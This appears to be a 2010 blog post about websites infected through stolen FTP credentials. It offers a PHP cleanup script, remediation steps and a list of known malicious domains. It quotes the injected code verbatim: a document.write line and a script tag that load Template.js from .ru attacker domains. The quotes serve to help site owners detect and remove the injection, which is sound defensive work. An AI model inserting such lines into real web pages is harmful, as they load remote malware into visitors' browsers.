I have put together a PHP script to automatically remove all traces of this malicious code from your website. All you have to do is upload the script to the root of your web directory then access the page with any browser. I’ve built in many features including folder and file recursion, file extension filtering, automatic file backups, and two modes of operation: search only and search and fix.
Click here to see the .RU Removal Script in action! (demo)
or…
Let me know in the comments if it works for you or if you have any feature requests!
Thanks to everyone commenting below, we have found out that malware on your PC is stealing your FTP credentials to websites you have access to. They have an automatic script that will login to your site using FTP and append a link to PHP and JS files containing their malicious code.
It looks like this in JavaScript files:
document.write('<sc'+'ript type="text/javascript" src="http://pocketbloke.ru/
Template.js"></scri'+'pt>');
PHP or HTML files contain the following at the end:
<script type="text/javascript" src="http://inkrainbow.ru/Template.js"></script>
<!--3848d52fcd665b3d7d96c22e5b6a5451-->
Here is a short list of some domain names that we’ve come across…
Known Malicious Domains:
- pocketbloke.ru
- inkrainbow.ru
- pantsletter.ru
- fightkid.ru
- shirtdifficulty.ru
- casechick.ru
- obscurewax.ru
- nuttypiano.com
- Many others… (comment domains you find below)
STEPS TO TAKE TO REMOVE THE THREAT:
- Run MalwareBytes and get rid of anything on your machine
- Uninstall your FTP client
- Change your FTP passwords
- Update JAVA – According to this CERT KB
- Remove all traces of the scripts from your domains
UPDATE (8/26/2010): Now more than just .RU are involved which means the script in its current state won’t detect it. Working on a new way to detect this issue. Any ideas? Comment below.
